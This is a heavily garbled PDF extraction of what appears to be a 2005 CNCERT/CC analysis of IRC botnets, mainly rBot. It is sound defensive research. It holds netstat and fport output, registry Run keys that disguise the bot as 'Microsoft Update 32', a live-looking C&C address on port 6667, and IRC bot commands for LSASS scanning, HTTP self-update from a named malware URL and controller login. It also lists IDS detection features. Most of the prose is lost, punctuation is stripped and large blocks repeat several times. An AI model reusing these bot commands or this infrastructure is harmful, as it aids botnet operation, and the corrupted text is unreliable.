TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 *:* UDP 69
UDP 0.0.0.0:445 *:*
UDP 10.0.0.1:137 *:*
UDP 10.0.0.1:138 *:*
fport.exe
C:\>fport | find "1150" 1150 6667
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe
C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe
6667 69 wininit.exe rBot
wininit.exe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Microsoft Update 32" wininit.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices "Microsoft Update 32" wininit.exe
Wininit 445 6667
IP
203.151.217.85 6667
TCP
Wininit IRC
->NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 CHN|9148119\r\n ( )
->JOIN #xdcc dropit\r\n ( xdcc dropit)
<-:CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :advscan asn1smb 100 5 0 b ( advscan asn1smb )
->PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n ( )
CNCERTCC 2005
[1] 2005.4
[2] Paul F. Roberts, "Malicious Bots Hide Using Rootkit Code", May 17, 2005, http://www.eweek.com/article2/0,1759,1816972,00.asp
[3] Honeynet Project, "Know Your Enemy: Tracking Botnets"
[4] Felix C. Freiling, Thorsten Holz and Georg Wicherski, "Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks", http://www.honeynet.org/papers/individual/
[5] Jonas Bolliger, Thomas Kaufmann, "Detecting Bots in Internet Relay Chat Systems", www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29/task.pdf
[6] Honeynet Project, "Know Your Enemy: Phishing", http://www.honeynet.org, 16th May 2005
[7] Helen J. Wang, Chuanxiong, Daniel R. Simon and Alf Zugenmaier, "Shield: First-Line Worm Defense", Microsoft Research, ACM SIGCOMM 2004
[8] http://www.mwcollect.org
[9] http://www.cert.org
[10] http://www.messagelab.co.uk
[11] Joe Stewart, "Emerging Threats: From Discovery to Protection", www.sdissa.org/downloads/emergingthreats-public.pdf
[12] http://www.ciphertrust.com/resources/statistics/zombie.php
[13] Lurhq Threat Intelligence Group, "Phatbot Trojan Analysis", http://www.lurhq.com/phatbot.html
[14] Lurhq Threat Intelligence Group, "Sinit P2P Trojan Analysis", http://www.lurhq.com/sinit.html
[15] http://www.symantec.com/press/index_2004.html
[16] Tom Vogt, "Simulating and optimising worm propagation algorithms", www.securityfocus.com/guest/24046, 2003.9
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
